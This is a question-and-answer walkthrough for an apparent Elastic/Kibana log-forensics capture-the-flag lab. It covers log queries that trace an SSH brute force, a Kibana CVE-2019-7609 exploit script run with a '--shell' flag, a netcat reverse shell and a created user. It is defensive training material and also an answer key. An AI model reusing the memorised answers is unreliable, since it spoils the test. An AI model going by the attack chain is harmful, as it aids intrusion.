# GitTheGate Lab Q1) Using the "View Surrounding Documents" option, find the ID of the document that is 14 documents before (older) the id GDQOB3IBwJHf9VOW-r0Y? ```xquery _id: GDQOB3IBwJHf9VOW-r0Y ```

Answer: tzQOB3IBwJHf9VOW-Lyd Q2) Using the "View Surrounding Documents" option, find the IP of the document that is 16 documents after (newer) the id vDQOB3IBwJHf9VOW-Lyd?

Answer: 191.189.39.130 Q3) How many requests have come from the IP address 2.49.53.218 between the 6th of May and the 13th of May? (time is in UTC)

```xquery ip: 2.49.53.218 ```

Answer: 7 Q4) What percentage of logs are from windows 8 machines on the 11th of May? (time is in UTC)

Answer: 21.74% Q5) How many 503 errors were there on the 8th of May? (time is in UTC)

``` response: 503 ```

Answer: 8 Q6) How many connections to the host "[www.elastic.co](http://www.elastic.co)" were made on the 12th of May? (time is in UTC) ```xquery host: www.elastic.co ```

Answer: 82 Q7) What is the second most common extension of files being accessed on the 12th of May? (time is in UTC)

Answer: .gz Q8) Find the first IP address to connect to the host elastic-elastic-elastic.org on the 12th of May. (time is in UTC) ```xquery host: "elastic-elastic-elastic.org" ```

Answer: 114.246.225.218 Q9) What was the username used that failed to log in on the 15th of May at 10:44 pm? (time is in UTC) ```xquery event.type: "authentication_failure" ```

Answer: deploy Q10) According to the logs, which vulnerable version of Kibana was identified as running in the stack?

Answer: 7.6.2 Q11) Using current data in the auditbeat index, what is the name of the elasticsearch node? (one word)

Answer: elkstack Q12) What is the name of the beat to collect windows logs? (one word) Answer: winlogbeat Q13) What is the name of the beat that sends network data? (one word) Answer: packetbeat **Q14)** How many fields are in the auditbeat-\* index pattern?

Answer: 437 Q15) On the 14th of May, how many failed authentication attempts did the host server receive? (time is in UTC) ```xquery event.type: authentication_failure ```

Answer: 762 Q16) On the 13th and 14th of May, how many bytes were received by the source IP 159.89.203.214 (time is in UTC) ```xquery source.ip: "159.89.203.214" ```

Answer: 492,919 Q17) What username did they crack? ```xquery event.type: 'authentication_success' ```

```xquery event.type: 'authentication_failure' ```

Answer: johnny Q18) What host was attacked?

Answer: sshbox Q19) How many were failed attempts made on the machine? ```xquery event.type: 'authentication_failure' ```

Answer: 12523 Q20) What time was the last failed attempted login? ```xquery event.type: 'authentication_failure' and host.name: 'sshbox' ```

Answer: 11:39:31 Q21) What time did the attacker successfully login? Based on the scenario, the attack is believed to have occurred on May 25th between 9:00 AM and 11:30 AM.

Answer: 11:50:13 Q22) What tool did the attacker use to get the exploit onto the machine?

Answer: git Q23) Shortly after getting the exploit on the machine, the attacker used vim to create a file. What is the name of that file?

Answer: ElasticCTFisFun! Q24) What is the filename of the exploit that was run?

Answer: CVE-2019-7609-kibana-rce.py Q25) What is the first ID of the log that shows the exploit being run? ```xquery agent.hostname:"sshbox" and *CVE-2019-7609-kibana-rce.py* ```

Answer: \_SHbS3IBCEolQs9lAD3z Q26) What parameter turned the script from testing to exploiting? From this link: Answer: --shell Q27) Determining the destination IP is key to tracing the attacker’s actions. What is the destination IP address where the malicious shell was sent? ```xquery agent.hostname:"sshbox" and process.name:"nc" ```

Answer: 10.116.0.2 Q28) Identifying new users is vital to uncovering unauthorized access. What was the name of the user they created? ```xquery process.name: useradd ```

Answer: Thanks4Playing